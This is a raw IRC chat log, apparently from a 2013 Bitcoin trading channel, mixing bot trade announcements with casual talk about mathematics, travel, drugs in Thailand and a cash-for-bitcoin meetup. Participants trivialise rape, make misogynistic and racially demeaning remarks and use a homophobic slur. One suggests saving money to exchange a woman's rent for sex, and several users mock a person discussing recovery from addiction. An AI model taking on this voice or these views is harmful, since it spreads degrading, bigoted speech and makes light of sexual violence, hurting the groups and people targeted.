in these situations, and the 2 men that you secretly had killed, they could put you in jail from beyond the grave if you are discovered. You live in a world of unprecedented prosperity, where vigilantism is prohibited. May 05 15:37:09 is this is acceptable from this peasant father perspective? May 05 15:37:27 you know this is exactly how women got pregnant for most of human history ? May 05 15:37:39 and when i say most i don't mean 51%. i mean 99.9999addnines% May 05 15:38:06 granted, and it's also how most animals get pregnant May 05 15:38:10 for that matter, if your putative daughter gets raped today your practical recourse is May 05 15:38:20 ;;google that russian guy who went on a rampage cause they raped his daughter May 05 15:38:22 War rape - Wikipedia, the free encyclopedia: ; List of serial killers by number of victims - Wikipedia, the free ...: ; Ram Singh: Delhi gang rape suspect's family claim he was ...: totally useful this google doohickey. May 05 15:38:40 explain to me again why people think it should have a higher market cap than mpoe ? May 05 15:40:13 marketing ;) May 05 15:40:18 ol May 05 15:40:21 good one May 05 15:40:53 [MPEX] [S.MPOE] 14386 @ 0.0006992 = 10.0587 BTC [+] May 05 15:43:04 mircea_popescu, you know sexual molestation is not only prevalent among females, but also among males. We are truly animals when we allow ourselves to be, and who can estimate the lost productivity due to the social and psychological handicaps imposed by such scarring episodes of violence? May 05 15:43:31 [BTCTC] [ASICMINER-PT] 12 @ 1.222222 = 14.6667 BTC [+] May 05 15:43:36 [BTCTC] [ASICMINER-PT] 4 @ 1.222222 = 4.8889 BTC [+] May 05 15:44:10 it is perhaps true that if society accepted it the negative impact per rape victim would go down, but the net effect would be negative almost surely, since the new rape-rate equilibrium would be immense May 05 15:44:37 and yet still probably cheaper than the loss due to marketing and irrational consumerism, hah. May 05 15:44:48 indeed. May 05 15:44:56 i am not arguing rape is good May 05 15:45:02 i am arguing rape is bad and marketing is way worse. May 05 15:45:17 seriously argentina? May 05 15:45:43 also rape can be good if she asks for it in that certain way :) May 05 15:45:59 but that's hardly rape, however much it may attempt to simulate it May 05 15:46:25 [BTCTC] [BTC-TRADING-PT] 1 @ 0.2 BTC [-] May 05 15:48:37 [BTCTC] [B.YABMC] 50 @ 0.015 = 0.75 BTC [-] May 05 15:49:32 [BTCTC] [ESECURITYSABTC] 12 @ 0.38499 = 4.6199 BTC [+] May 05 15:49:51 hehe, I dunno if that constituted rape though May 05 15:50:33 certainly the men felt that the would not have to answer to rape charges due to the nature of the sex play situation, and she never filed charges, and seems to have chalked it up as "just one of those things" May 05 15:50:59 does she still want to be tied up? May 05 15:51:21 hehe, lovely girl, and a smart mathematician, the best tit's I've ever... kakobrekla yes May 05 15:51:23 [BTCTC] [PAJKA.BOND] 1 @ 0.108899 BTC [+] May 05 15:51:33 but she's getting married now, sadly :D May 05 15:51:47 not so smart mathematitican then May 05 15:52:04 haha, if you were a mathematician you'd know just how stupid we are May 05 15:53:10 I once spent 5 hours arguing with her that transfinite ordinals are no obviously inconsistent, against her objections May 05 15:53:41 and then we went to bed, and the next morning she was up proving the basic properties of transfinite ordinals May 05 15:53:55 hehe May 05 15:54:12 and had made me pankakes and written "you were right" in whipped cream May 05 15:55:11 the _only_ argument I ever 'won', that girl was stubborn May 05 15:55:28 titican lol May 05 15:55:57 lol May 05 15:56:14 [BTCTC] [ASICMINER-PT] 10 @ 1.249999 = 12.5 BTC [+] May 05 15:56:27 cads http://trilema.com/2010/nsfw-mosu-cu-joarda/ May 05 15:56:29 [MPEX] [S.MPOE] 8445 @ 0.0006992 = 5.9047 BTC [+] May 05 15:56:30 there, no rope needed. May 05 15:56:43 also learn to skim read May 05 15:57:39 [BTCTC] [ESECURITYSABTC] 4 @ 0.385 = 1.54 BTC [+] May 05 15:57:57 anyway, so did she ever find the aleph-one ? May 05 15:59:06 [BTCTC] [ASICMINER-PT] 1 @ 1.25 BTC [+] May 05 15:59:25 mircea_popescu: yeah, his name is shawn, and they're pretty perfect for each other - each as stubborn as the day is long May 05 15:59:32 nono May 05 15:59:46 i mean, the intermediate cardinal May 05 16:00:03 between naturals and reals. May 05 16:00:15 haha, we never did talk about the continuum hypothesis May 05 16:00:32 but that'd have been the end of your debate May 05 16:00:42 here, there's an extra infinite. May 05 16:02:43 we got to isomorphism classes between ordered set, and I tried at long length to motivate that the real numbers were not countable, and she kept coming up with silly schemes to try to count them, because to her, at the time, it was absolutely absurd for there two be two infinite sets with qualitatively different amounts of infiniteness May 05 16:02:57 um May 05 16:03:07 that's easily provable tho neh ? cantor's countability trick May 05 16:03:22 sort out all the numbers then show you can make one which is distinct from each on a different digit May 05 16:03:51 by "easily provable" i mean easily showable to the intuitive approach May 05 16:04:11 yep, suppose that C_k : N -> R is a counting of the real numbers, then there exists a number x_k such that x_k is not in the image of C_k May 05 16:04:57 x_k is easy to construct for any possible C_k May 05 16:05:01 ya but it helps if you actually list them out May 05 16:05:03 but anyway May 05 16:05:41 [BTCTC] [ASICMINER-PT] 3 @ 1.249999 = 3.75 BTC [-] May 05 16:06:00 [MPEX] [S.MPOE] 15938 @ 0.00069433 = 11.0662 BTC [-] May 05 16:06:02 [MPEX] [S.MPOE] 5362 @ 0.00069088 = 3.7045 BTC [-] May 05 16:06:58 alternatively of course, she could have proven the continuum, thus proving frankel set theory incorrect,which is also good enough May 05 16:07:11 either way, either by producing a counter example or by actually showing the hyptothesis to be correct May 05 16:07:23 and by incorrect i mean inconsistenty May 05 16:09:11 it was strange, like a cognitive blindspot - I tried what you suggest, and a few other approaches that I invented just during that conversation (which have been useful in similar situation). I lost a lot of faith in her as a mathematician, but regained it in the morning - she was chattering like a bluejay about how she now sees why she was wrong in her reasoning and why I was right: her intuition was that you can't just infinitely exte May 05 16:09:11 nd C_k to C_k', and for some reason just wasn't getting that _forall_ C_k there is an x_k, and that even any C_k' that she could concoct would also have its own fatal x_k'. May 05 16:10:04 lol May 05 16:10:06 mircea_popescu: now wouldn't that have been a sight? two stoned college math students, disproving ZFC May 05 16:10:10 freud would have been happy May 05 16:10:13 "see ? woman brain!" May 05 16:10:18 schopenhauer even happier. May 05 16:10:24 in his gloomy way. May 05 16:12:41 to her credit, her area was in the statistics of neuronal bursting in biological neural networks, and for some god awful reason, basic logic courses at our university do _not_ adequately introduce foundational issues such as ordinals or even set theory as an axiomatic topic May 05 16:13:02 anyway, it is my considered opinion (along with, i wager, most everyone else's) that positively the ONLY way that's getting show to be inconsistent is May 05 16:13:14 by some intoxicated kids during having sex or somesuch May 05 16:13:19 everything else was tried to death. May 05 16:13:58 it's like, naive set theory without talking about the axiom of choice, or the axiom of infinity, or the implications.. part of the reason I recently dropped out - if this is what the undergraduate math degree means here, I'm not interested in it May 05 16:14:17 mircea_popescu: haha, you may be on to something May 05 16:15:11 maybe she was on to the truth and I squelched her breakthrough! May 05 16:15:20 feelbad.gif May 05 16:17:21 I stopped hanging out with her to get sober and start hanging out with a vocalist/painter, and then a year later I found she's engaged - I wonder if she knows I still have sentiment.. it's not something I thought I had May 05 16:17:35 well did you tell her ? May 05 16:20:45 not at the time, and not since I heard she was settling down - I was muddled up back then, and more recently I figured she has a chance at happiness with her guy, and have wished that to her. May 05 16:21:04 Chaaang-Noi: I'll buy some THB from you for BTC if you're in a bad way. May 05 16:21:11 stop being such a fag and tell the girl. May 05 16:21:22 Gotta pay for my fun somehow. May 05 16:22:05 It's not a longing sentiment, since we had our issues, and she's still a toker, and I still am sober, thought you're probably right, it would not hurt her to know that I marvel and take joy in the high points of our relationship May 05 16:22:39 for the record, i never met a sane mathematician who was any good. May 05 16:22:54 if you had a business head on your shoulders as good as mine, you'd start a special slush fgund about now May 05 16:23:20 and when her current relationship implodes you can bridge her for half a year on rent and food while she sucks your cock and figures out what next. May 05 16:23:30 [BTCTC] [ASICMINER-PT] 1 @ 1.249999 BTC [-] May 05 16:23:41 brilliant strategery May 05 16:24:45 you can even tell her this when it happens and she's all confused, "honey... here's a chatlog" May 05 16:25:32 zebedee_ pix ? May 05 16:26:51 you're talking to someone that just a year ago found the idea of leverage very exotic, and just 6 months ago was aghast to find out that his financial position has sickeningly leveraged re. his student loans, and decided to put his schooling on panic crash May 05 16:27:07 haha, for me to set aside a slush fund just for women, now that would be bold May 05 16:27:55 lol well... not ghood ideas are practical. May 05 16:27:59 but not hard at all, and a fun exercise in personal wealth management May 05 16:29:37 pix? Meeting Goat on Tuesday. May 05 16:29:53 Nothing wrong with enjoying getting tied up. I like both ends myself. May 05 16:33:02 http://farm8.staticflickr.com/7046/6855106703_844f08ffbd_z.jpg I've had shibari lessons from this dude. May 05 16:34:02 i never took lessosn May 05 16:34:17 Definitely helps; Japanese are the best IMO. May 05 16:34:40 helps what tho ? May 05 16:35:09 There's skill in a) safety (quick release, avoiding pressure in bad areas etc). and b) aesthetics May 05 16:35:30 I've seen others and there's a lot lacking, to my eyes at least. May 05 16:35:46 safety is unrelated tho, it's just a study of anatomy. can learn it a thousand different ways. May 05 16:35:54 and i guess my motivation is not aesthetical. May 05 16:36:08 or if it is, it's personal rather than cultural. i couldn't care less what some japanese dude finds beautiful. May 05 16:37:37 zebedee_ im not in a bad way but i could buy some thai baht, you in thailand? May 05 16:37:53 Oh I thought you had too many. I don't have any. May 05 16:38:05 Will be on Tuesday as discussed. May 05 16:38:20 oh right, sorry, did not even register :) May 05 16:38:24 lol May 05 16:38:36 You wanna sell THB? If not I'll just dump some JPY notes. May 05 16:38:43 some guy wants to meet me to sell 30,000 thai baht for btc wheni go May 05 16:39:09 you want to buy more btc May 05 16:39:11 ? May 05 16:39:25 No I want THB. I'm indifferent to dropping some BTC or JPY. May 05 16:39:29 oh right, sorry, i did not read that collectly May 05 16:39:38 If you want to sell THB then I'll buy some off you. If you don't it's cool. May 05 16:39:55 yeah ill sell you thai baht May 05 16:40:01 how much are you looking for? May 05 16:40:21 OK. About $1k equivalent, so perhaps 30k THB. May 05 16:40:27 yeah thats cool May 05 16:40:52 there is a guy who is going to meet me in bkk with 30,000 thb to buy btc so this should work out perfectly May 05 16:40:56 OK. Let's call it 25k for now. May 05 16:41:01 yeah thats fine May 05 16:41:06 im easy May 05 16:41:06 Nice. May 05 16:41:13 [BTCTC] [B.YABMC] 7 @ 0.015 = 0.105 BTC [-] May 05 16:41:17 [BTCTC] [B.YABMC] 3 @ 0.015 = 0.045 BTC [-] May 05 16:41:22 [BTCTC] [B.YABMC] 13 @ 0.01426 = 0.1854 BTC [-] May 05 16:41:43 [BTCTC] [B.YABMC] 4 @ 0.01425 = 0.057 BTC [-] May 05 16:42:36 ill have cash on hand even if thqat other guy does not show May 05 16:42:46 he has not responced once i confirmed the dats May 05 16:42:48 dates May 05 16:42:56 OK, done. May 05 16:43:06 cool May 05 16:43:07 I'll have them on my phone. May 05 16:43:20 you can send to my laptop? May 05 16:43:36 Of course; I send to a BTC address :) May 05 16:43:51 i can send you an address before hand but dont send until we meet and i show you the cash May 05 16:44:03 Sure that's not a problem. May 05 16:44:07 its crazy sending in advance May 05 16:44:17 you hear about that finish guy? wired me 2.65 million baht May 05 16:44:21 I was assuming you'd show me a QR on your mobile, but whatever. May 05 16:44:26 still has not asked for his btc May 05 16:44:34 yeah i dont trust phones May 05 16:44:34 Yeah; that's why I thought you had too many THB. May 05 16:44:44 I can understand that. May 05 16:45:06 iv used them just to try it out, but id rather just use the laptob May 05 16:45:12 tob May 05 16:45:15 No probs. May 05 16:45:15 fuck May 05 16:45:19 sorry, had a few beers May 05 16:45:23 cant type May 05 16:45:44 we are moving and giving away a lot of our extra furniture and stuff to the cambodian migrant workers here May 05 16:45:51 and well, cant work with out beer :) May 05 16:46:06 Which part of Thailand do you live in? May 05 16:46:23 mircea_popescu, I think you've inspired me to put a beginning of a story on my (currently nearly empty) blog. May 05 16:46:52 cool. May 05 16:46:58 it will be far grittier than yours, just a start to a possible tale of intrigue May 05 16:47:56 i live near koh chang May 05 16:48:00 near the cambo boarder May 05 16:48:07 lots of fruit orchirds here May 05 16:48:10 so lots of workers May 05 16:48:16 Ah right. I was in Siam Reap in November. May 05 16:48:22 cool May 05 16:49:00 [MPEX] [S.MPOE] 1500 @ 0.0006992 = 1.0488 BTC [+] May 05 16:49:03 hey that guy just contacted me May 05 16:49:23 should i invite him to nana? i honestly know almost nothing about him so i dont know if he is cool or not May 05 16:49:29 he is new to btc May 05 16:49:34 but seems to live in bkk May 05 16:49:42 Up to you. May 05 16:49:56 You seem to be not too far from Koh Samet - I was there in Feb! May 05 16:50:24 yeah, im more east May 05 16:51:44 ;;calc 6.07*1.12 May 05 16:51:45 6.7984 May 05 16:51:58 anyway i gota go afk for a bit, bbl peace May 05 16:52:04 ttyl May 05 16:55:49 mircea_popescu: What languages do you speak? May 05 16:56:26 a few, why ? May 05 16:56:34 Just curious. May 05 16:56:46 Your English is v. good. Wondering how you learnt. May 05 16:57:30 you learn languages from women, is my experience. May 05 16:57:53 Lol. It's why I learnt Japanese at least. May 05 16:59:04 yeah/. they call it "mother's tongue", but it's not really that special. May 05 17:07:45 [MPEX] [S.DICE] 2828 @ 0.003388 = 9.5813 BTC [+] May 05 17:07:46 [MPEX] [S.DICE] 143 @ 0.00338999 = 0.4848 BTC [+] May 05 17:11:51 What software creates those weird comments in blogs that are something like "[...] some words or other [...]" with the square brackets? What's that all about? May 05 17:14:43 [BTCTC] [ASICMINER-PT] 1 @ 1.2499 BTC [-] May 05 17:14:50 [MPEX] [S.MPOE] 13867 @ 0.0006992 = 9.6958 BTC [+] May 05 17:15:34 mp i learned thai froom women May 05 17:15:40 never used a book May 05 17:16:44 [BTCTC] [ASICMINER-PT] 4 @ 1.249999 = 5 BTC [+] May 05 17:18:02 yeah. May 05 17:21:44 [BTCTC] [ASICMINER-PT] 1 @ 1.24999 BTC [-] May 05 17:29:03 [BTCTC] [ASICMINER-PT] 1 @ 1.24999 BTC [-] May 05 17:29:14 [BTCTC] [ASICMINER-PT] 2 @ 1.249999 = 2.5 BTC [+] May 05 17:40:10 [BTCTC] [TAT.ASICMINER] 13 @ 0.0126 = 0.1638 BTC [+] May 05 17:46:09 [BTCTC] [S.BBET-PT] 5 @ 0.00165 = 0.0083 BTC [-] May 05 17:46:19 [BTCTC] [S.BBET-PT] 8 @ 0.0016 = 0.0128 BTC [-] May 05 17:47:11 [BTCTC] [ASICMINER-PT] 2 @ 1.25 = 2.5 BTC [+] May 05 17:56:29 [BTCTC] [ASICMINER-PT] 1 @ 1.244 BTC [-] May 05 17:56:32 [BTCTC] [ASICMINER-PT] 1 @ 1.243 BTC [-] May 05 17:56:36 [BTCTC] [ASICMINER-PT] 1 @ 1.24 BTC [-] May 05 18:02:31 [BTCTC] [BTC-BOND] 994 @ 0.01003 = 9.9698 BTC [+] May 05 18:08:27 i have the urge to smoke some weed, have not done so in years, odd May 05 18:08:35 [BTCTC] [ASICMINER-PT] 11 @ 1.268999 = 13.959 BTC [+] May 05 18:08:36 that sounds dangerous in thailand May 05 18:09:06 I accidentally smoked a bit in Budapest May 05 18:09:11 and found out that it's a big no-no May 05 18:10:10 I crossed the Hungary/Croatia border with a little bit of weed and that's apparently a big source of international tension with Hungary, because Hungary is super hardcore about drugs and will throw you in jail for 15 years without a trial for 5, and quite a few foreigners are in that situation May 05 18:16:05 using drugs in thailand is fine May 05 18:16:11 selling or traficing is a big no no May 05 18:16:22 ah, okay May 05 18:16:23 the police and army sell and trafic here so its harsh punsihment May 05 18:16:32 however they dont care if you buy and use their products May 05 18:16:35 for competing with them? :P May 05 18:16:47 yeah, they will kill you on site if you are thai May 05 18:16:51 no shit May 05 18:16:53 wow May 05 18:17:04 if you are not paying the right guy you are good as dead if caught May 05 18:17:16 if not dead then 15 years in jail or so May 05 18:17:29 buying your way out is millions of baht May 05 18:18:01 but really a farang smoking a joint, they dont give a fuck May 05 18:18:16 now meth is becoming an issue here, as it leads to crime May 05 18:18:21 so they are cracking down on meth May 05 18:18:27 people get hooked then steal shit May 05 18:18:35 with opium or weed, they dont give a fuck May 05 18:18:35 [BTCTC] [S.DICE-PT] 18 @ 0.003279 = 0.059 BTC [+] May 05 18:18:46 ah May 05 18:18:56 how about shrooms/acid/the weirder crap? May 05 18:19:18 yeah thats fine, but you ahve to get it in tourist areas, and the dealers are paying the cops for sure (or they wont last) May 05 18:19:49 [BTCTC] [S.DICE-PT] 2 @ 0.003279 = 0.0066 BTC [+] May 05 18:19:55 thais done use that stuff May 05 18:20:19 really the thais mostly use "yaa baa" or meth May 05 18:20:46 coke is rally high here (far from the source) May 05 18:20:54 h is cheap as fuck as is opium May 05 18:21:21 weed too May 05 18:21:26 but its mostly wild May 05 18:21:36 not as good as the high end stuff you get in the usa May 05 18:22:25 I accidentally smoked a bit in Budapest May 05 18:22:30 how do you accidently smoke? May 05 18:22:42 oh I meant that had I known how harsh their laws were, I wouldn't have dreamt of doing that May 05 18:22:51 [BTCTC] [S.MPOE-PT] 3 @ 0.000698 = 0.0021 BTC [+] May 05 18:22:51 or even bringing any into hungary May 05 18:22:56 ahh May 05 18:23:06 i dont cross boarders with it, never never never May 05 18:23:08 it was just the end of a little baggie I had with me while traveling around europe May 05 18:23:12 lol, did lots of that May 05 18:23:22 but hungary is particularly bad May 05 18:23:28 should've just finished it off in croatia May 05 18:23:53 I bought it legally in amsterdam, had most of it, and then forgot about it until I got to slovenia May 05 18:24:10 i want to travel europe like that May 05 18:24:15 I got one of those rail passes May 05 18:24:17 it was great May 05 18:24:25 i dont know anyone to go with May 05 18:24:30 very spontaneous travel with my gf for over a month May 05 18:24:41 we'd just say "oh, that train looks cool" and hop on May 05 18:24:41 yeah that would be cool May 05 18:24:56 but my wife will have a hard time getting visa i bet cuz she is thai May 05 18:25:11 yeah :/ it might still be possible, not sure how hard May 05 18:25:19 yeah May 05 18:25:20 lots of foreigners get those rail passes May 05 18:25:27 they actually have different ones for non-EU citizens May 05 18:25:47 annoyingly different price structures but not significantly different levels May 05 18:25:53 money would not be the issue, it would be the visas May 05 18:25:59 so I had to buy a new pass in the middle of the trip because I got the EU one May 05 18:26:07 oh that sucks May 05 18:26:23 yeah, not terrible though May 05 18:26:32 anyway, definitely recommended May 05 18:26:42 some countries are more annoying about letting you use it, but it was still mostly a win May 05 18:26:54 id love to do it, but think it would suck if i did it alone May 05 18:27:11 I'm not sure it would suck, but if you have a SO it would be kind of weird not to do it with them :) May 05 18:27:26 I think traveling alone and meeting cool people in hostels is also fun May 05 18:27:51 im not as out going as you might think :) May 05 18:28:00 :P May 05 18:28:21 very content in my basement on irc :) May 05 18:28:57 if i did the euope thing or whever im sure id hook up with a local girl May 05 18:29:05 [HAVELOCK] [KCIM] 1 @ 1.465 BTC [+] May 05 18:29:11 and then travel, or id have a bad time May 05 18:29:29 big plans for cinco de mayo? May 05 18:40:48 [MPEX] [S.DICE] 97 @ 0.00338999 = 0.3288 BTC [+] May 05 18:43:00 [BTCTC] [BITVPS] 17 @ 0.00143 = 0.0243 BTC [+] May 05 18:43:11 [BTCTC] [BITVPS] 1 @ 0.00144 BTC [+] May 05 18:43:23 [BTCTC] [BITVPS] 625 @ 0.0016 = 1 BTC [+] May 05 18:43:30 [BTCTC] [BITVPS] 50 @ 0.001646 = 0.0823 BTC [+] May 05 18:43:41 [BTCTC] [BITVPS] 307 @ 0.001647 = 0.5056 BTC [+] May 05 18:44:41 [BTCTC] [BITVPS] 21 @ 0.001647 = 0.0346 BTC [+] May 05 18:44:45 [BTCTC] [BITVPS] 53 @ 0.001648 = 0.0873 BTC [+] May 05 18:44:57 [BTCTC] [BITVPS] 5 @ 0.001659 = 0.0083 BTC [+] May 05 18:45:02 [BTCTC] [BITVPS] 5 @ 0.001679 = 0.0084 BTC [+] May 05 18:45:21 [BTCTC] [BITVPS] 5 @ 0.001699 = 0.0085 BTC [+] May 05 18:45:32 [BTCTC] [BITVPS] 5 @ 0.00172 = 0.0086 BTC [+] May 05 18:52:14 [MPEX] [S.MPOE] 15550 @ 0.0006992 = 10.8726 BTC [+] May 05 18:54:03 * copumpkin fucks Chaang-Noi May 05 18:54:11 that casued some lulz this morning :) May 05 18:54:19 mp was like wtf! May 05 18:54:24 :) May 05 18:54:34 cuz i said "good morning" May 05 18:55:02 mornin May 05 18:55:17 :) May 05 18:55:54 [BTCTC] [BTC-BOND] 1 @ 0.01003 BTC [+] May 05 18:57:08 [BTCTC] [BTC-BOND] 1 @ 0.0101 BTC [+] May 05 19:02:15 ;;ticker May 05 19:02:16 BTCUSD ticker | Best bid: 114.90000, Best ask: 115.33333, Bid-ask spread: 0.43333, Last trade: 115.43210, 24 hour volume: 103063.96248364, 24 hour low: 107.00000, 24 hour high: 118.85000, 24 hour vwap: 112.75249 May 05 19:04:15 haha, copumpkin I never knew you partoked May 05 19:04:24 :P May 05 19:04:49 [BTCTC] [TAT.ASICMINER] 2 @ 0.012501 = 0.025 BTC [-] May 05 19:04:54 [BTCTC] [TAT.ASICMINER] 48 @ 0.0125 = 0.6 BTC [-] May 05 19:05:29 not that it's of any consequence (I had to quit, but I don't judge) May 05 19:05:49 also, cool you see you here May 05 19:06:08 I've never actually done it in the US May 05 19:06:21 I could, since my job doesn't check, but not particularly interested May 05 19:10:45 hmm, am I right to remember that last we talked ( a couple years ago) you were a grad student in midwest university? May 05 19:11:15 nah, I was in a new england university :) but I quit my phd and moved on May 05 19:11:23 but yeah, we did speak about it May 05 19:11:40 I remember I was writing my college application, and you gave me your encouragement May 05 19:11:48 yup :) May 05 19:11:52 going well? May 05 19:11:56 he flunked May 05 19:12:01 o irc reunion? May 05 19:14:19 copumpkin: classes were boring. Substance abuse got unmanageable, and my debt was insane. I'm taking a year or two off to work on my sobriety, to work my same old job as a machinist and deleverage my debt a bit, and to wait and see what happens with higher education. May 05 19:14:41 ah, sorry to hear that May 05 19:15:11 da fuck this is the first time i hear someone say that. May 05 19:15:20 what were you abusing ? May 05 19:15:29 just pot and alcohol May 05 19:15:44 hm May 05 19:16:02 ok, that i did hear. May 05 19:16:33 still waiting for the speed freak going "well it was getting unmanageable so i'm taking a year off to deleverage and see what happens" May 05 19:16:35 There are currently 0 bitcoins offered at or under 50.0 USD, worth 0.0 USD in total. | Data vintage: 0.0068 seconds May 05 19:16:39 There are currently 166245.52 bitcoins demanded at or over 50.0 USD, worth 13301613.3048 USD in total. | Data vintage: 4.3633 seconds May 05 19:16:45 There are currently 112560.13 bitcoins offered at or under 200.0 USD, worth 16843994.4159 USD in total. | Data vintage: 9.8288 seconds May 05 19:19:28 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19499 BTC [-] May 05 19:19:49 [BTCTC] [CRYPTO-TRADE] 3 @ 0.195 = 0.585 BTC [+] May 05 19:20:12 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19799 BTC [+] May 05 19:20:20 mircea_popescu: I don't mind talking about my substance problem - I'm amazed and embarrased - I kicked speed and heroin to the curb back in 2007, but I thought pot and booze were fine. It's shameful that those brought me lower than anything else has. It's... refreshing to finally be in a spot where I can say _no_ drug is _ever_ going to be a good May 05 19:20:29 a good investment* May 05 19:21:10 well um... drugs aren't investments are they May 05 19:21:41 mircea_popescu: I share mostly because from time to time people hear my story, and ask me about how they can get clean May 05 19:21:55 tiberiusiv: absolutely :) May 05 19:22:21 tiberiusiv: it's not something I could address till I admitted, basically May 05 19:22:36 tiberiusiv: you may of course ignore all I have to say May 05 19:22:59 tiberiusiv: and you are not someone that needs to hear what I have to say May 05 19:23:12 trolling 12-steppers is the lowest May 05 19:23:15 cads, no need to argue with tibby, just ignore him May 05 19:23:17 cads dont mind local trolls May 05 19:23:29 tiberius, and if that's true, then I salute you May 05 19:23:49 did tiberiusiv win the substance abusing competition too ? May 05 19:23:55 is he like real badass ? May 05 19:24:10 what's that trophy like? May 05 19:24:38 jurov, kakobrekla, you know, the 5th level of troll-fu is trolling the trolls with pure detachment ;) May 05 19:24:58 cads, i tried May 05 19:25:04 but i know when to stop May 05 19:25:12 jurov, I'm not there yet, lol May 05 19:25:15 not sure aobut you (pun intended) May 05 19:25:29 ;) May 05 19:25:47 benkay perhaps this : http://polimedia.us/dtng/c/src/136752522555.jpg in bronze. May 05 19:29:27 I mean, you think I'll continue talking to you if I can expect ridicule and if even your contemporaries call you a troll? May 05 19:29:36 Hah. May 05 19:29:50 tiberslav new lows today i see May 05 19:29:54 you need help May 05 19:30:02 You can apologize and recover your position or else wither. May 05 19:30:04 maybe cads can set you right May 05 19:30:58 dude i share all sorts of shit May 05 19:31:14 hell im smoking and drinking now May 05 19:31:14 how about not sharing your complaints tib May 05 19:31:24 rute them t dev/null May 05 19:31:28 to May 05 19:31:37 tiberslav feels the needs to share everything he gets upset about like some little girl May 05 19:31:56 drama queen tiberslav is May 05 19:32:01 all about tiberslav needs to be the center May 05 19:32:15 cool you have said it move on. May 05 19:32:25 mircea_popescu: i think this might work as well: http://imageshack.us/photo/my-images/96/pwnedk.jpg/?sa=0 May 05 19:33:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.01255 BTC [+] May 05 19:34:05 !l m s.dice May 05 19:34:06 Last trade for S.DICE on MPEX was at 0.00338999 BTC [+] May 05 19:34:32 lol May 05 19:35:26 there's all these liberals in my twitter feed wtf. May 05 19:35:40 its twitter May 05 19:35:43 what did you expect? May 05 19:35:54 the new social internet thrives on putting shit in front of you to raise your blood pressure May 05 19:35:54 crypto anarchists? May 05 19:35:56 well i hope they butthurt well. May 05 19:36:38 no Chaaang-Noi, those are on facebook May 05 19:37:12 mircea_popescu: they're in your feed? or following you? May 05 19:37:17 why are the crypto anarchists on facebook May 05 19:37:32 actually i know the answer to that May 05 19:37:39 cads in my feed May 05 19:38:24 mircea_popescu: if they were following you, you could make a game of offending them so greatly they unfollow you (and it would be fairly easy to analyze who unfollowed you, and what triggered it, lol) May 05 19:38:34 In 2000, economist and former U.S. Treasury Secretary Lawrence Summers became president of Harvard. Soon after, Summers held a private meeting with West, where he reportedly rebuked West for missing too many classes, contributing to grade inflation, neglecting serious scholarship, and spending too much time on his economically profitable projects. Summers reportedly suggested that West produce an academic book befittin May 05 19:38:34 g his professorial position, as his recent output had consisted primarily of co-written and edited volumes. According to some reports, Summers also objected to West's production of a CD, the critically panned Sketches of My Culture, and to his political campaigning, including an alleged three weeks to promote Bill Bradley's presidential campaign. May 05 19:38:49 black guy of no academic value whatsoever gets told off by harvard president May 05 19:39:06 harvard president is forced to step down within a year over having said women are maybe not quite as smart as men May 05 19:39:24 mircea_popescu: I have the same issue - I followed a bunch of people because they said something cool once or twice about category theory, haskell, or 3d printing, and the rest is all stuff about how their cat is awesome May 05 19:39:41 cads this is worse, it's all retweets of dumb shit. May 05 19:39:56 like how some adjuncts at some podunk uni should be paid or whatever nonsense May 05 19:40:25 the only twitter people I actually care to follow are dead authors - @kurt_vonnegut, mostly May 05 19:40:47 i'd never follow something like that. May 05 19:40:56 tiberiusiv, get the sand out of your vagina pls May 05 19:40:57 who is writing it and why are they using some brand May 05 19:41:13 +1 May 05 19:41:19 degredation in service May 05 19:41:38 benkay: is that so? May 05 19:42:09 it's like "hmm people are still saying mostly pointless things" May 05 19:42:26 tib has it handy. May 05 19:42:44 cads: it's a step backwards for the whole internet. May 05 19:42:57 kakobrekla: is tiberiusiv still talking :D May 05 19:43:09 cads fuck yea May 05 19:43:23 kakobrekla scam. i see nothing. May 05 19:43:39 http://log.bitcoin-assets.com/?date=05-05-2013&display=show#16891 May 05 19:43:41 thar May 05 19:43:45 also inception now. May 05 19:44:03 [BTCTC] [PAJKA.BOND] 2 @ 0.108899 = 0.2178 BTC [+] May 05 19:44:09 when did the log go live?! May 05 19:44:17 benkay i actually announced it yest May 05 19:44:25 shadap May 05 19:44:26 but you weren't paying attention!!1111! May 05 19:44:35 moar exclamation points plz May 05 19:44:44 11 May 05 19:44:49 hey u May 05 19:44:56 that's not what i assed for May 05 19:45:02 anyways thanks to all involved May 05 19:45:06 eleven May 05 19:45:08 https://bitcointalk.org/index.php?topic=195110.msg2035668#msg2035668 May 05 19:45:10 fucking forum tards May 05 19:45:11 this will make it vastly easier to pay attention May 05 19:45:19 girl spells it with an o. his own fucking link spells it with an o May 05 19:45:21 he spells it with an a May 05 19:45:30 WHERE DO THESE PEOPEL GO TO SCHOAL May 05 19:45:52 jajovregla : that's not what he assed for! May 05 19:46:06 [HAVELOCK] [HIM] 6 @ 1.9102 = 11.4612 BTC [-] May 05 19:46:56 kakobrekla: haha, cooool May 05 19:47:09 [BTCTC] [ASICMINER-PT] 2 @ 1.25 = 2.5 BTC [-] May 05 19:47:27 lmao May 05 19:47:31 hah, that's uncanny May 05 19:47:45 incpetion.. "we have to go deeper!" May 05 19:48:00 seems like /me's are skipped May 05 19:48:08 maybe ill fix it May 05 19:48:09 maybe i wont May 05 19:48:17 mandatory utube link May 05 19:48:17 what script are you using? May 05 19:48:33 kakobrekla: I might need that capability for one of my chat channels May 05 19:48:38 no script May 05 19:48:40 kakobrekla http://www.youtube.com/watch?v=3jbahu90GXU May 05 19:48:41 a few lines of code May 05 19:49:06 kako, would you mind zapping them to me? May 05 19:49:59 hehe, truly I am a lazy developer (I know full well that there have got to be turn key solutions for chat logging, already) May 05 19:50:17 i dunno if its much use to you really ... unless i give you assbot too ya know May 05 19:50:35 well i searched for a premade solutions May 05 19:50:37 for about 5 min May 05 19:50:40 then coded my own May 05 19:50:50 "maybe i'll come down! maybe I won't!" May 05 19:51:03 lol mircea_popescu May 05 19:51:12 :D May 05 19:51:19 he had a guy here a few years back, climbed on a roof all drunk and naked May 05 19:51:28 and demanded a helicopter and a pizza with an egg May 05 19:51:31 or else he jumps May 05 19:51:45 "don't fuck up my beer now" May 05 19:51:59 then the police took him down and they had brand new car and couldnt oper the back door May 05 19:52:04 twas a van accually May 05 19:52:16 lol May 05 19:52:18 the guy ended up driving in the front among the cops, naked May 05 19:52:21 ahahaha May 05 19:52:30 with a hardon ? May 05 19:52:33 class :) May 05 19:52:34 lol May 05 19:52:37 fearboner May 05 19:52:39 i dont remember seeing that May 05 19:53:00 